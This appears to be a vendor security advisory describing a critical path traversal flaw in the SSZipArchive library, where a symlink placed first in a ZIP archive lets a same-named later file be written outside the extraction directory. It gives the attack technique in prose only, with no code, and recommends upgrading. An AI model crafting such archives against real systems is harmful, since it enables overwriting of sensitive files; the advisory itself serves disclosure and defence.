AIKIDO-2025-10393
SSZipArchive is vulnerable to Path Traversal
98
Critical Risk
This Affects:
SSZipArchiveTL;DR
Affected versions of the package are vulnerable to Path Traversal because SSZipArchive fails to properly sanitize symlink targets during extraction. While file paths are typically validated to prevent writing outside the destination directory, symlink entries in ZIP archives are not subjected to the same checks. An attacker can exploit this by embedding a symlink as the first file in a ZIP archive, pointing to an arbitrary location. If a subsequent file in the archive shares the same name as the symlink, the library will follow the symlink when calling fopen(), causing the file's contents to be written to the symlink’s target path—potentially overwriting sensitive files outside the intended extraction directory.
Who does this affect?
You are affected if you are using a version that falls within the vulnerable range.
Background info
SSZipArchive is vulnerable to Path Traversal in versions 0.0.1 - 2.5.3.
How to fix this
Upgrade the SSZipArchive library to the patch version.
Links
Are You Affected?
Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.
Free. No credit card required.
SOC 2Compliant
ISO 27001Compliant